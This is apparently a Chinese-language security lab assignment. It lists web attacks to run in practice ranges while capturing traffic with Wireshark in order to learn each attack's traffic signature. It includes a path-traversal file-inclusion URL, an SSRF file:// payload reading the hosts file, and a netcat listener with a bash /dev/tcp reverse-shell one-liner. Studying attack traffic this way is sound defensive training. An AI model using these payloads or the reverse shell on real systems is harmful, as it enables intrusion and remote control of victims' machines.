演示如下漏洞的攻击过程,攻击过程中使用wireshark抓取攻击流量,定位关键字段,要求过程截图描述,演示完回答如何判断该漏洞的流量特征.
1.sql注入
环境:sqli靶场
查看关键字:union、select、等sql语句
查看数据流
2.xss
关键字:<script>、alert、等HTML代码
查看数据流
3.文件上传
环境:dvwn靶场
关键字:一句话木马
查看数据流
4.文件包含
环境:dvwn靶场
http://10.9.47.3/dvwa_2.0.1/vulnerabilities/fi/?page=../../phpinfo.php
查看数据流
5.文件读取
环境:metinfo_6.0.0网站
查看数据流
6.ssrf
环境:pikachu靶场
?url=file:///c:/windows/system32/drivers/etc/hosts
查看数据流
7.shiro反序列化
8.jwt
9.暴力破解
环境:dvwn靶场
爆破
查看数据流
10.命令执行
环境:dvwn靶场
关键字:cmd命令。如:whoami。
查看数据流
11.反弹shell
环境:一台Linux系统机器,一台kali.
kali开启nc
nc -lvvp 4444
bash -c 'bash -i >& /dev/tcp/192.168.221.128/4444 0>&1'
执行命令
查看数据流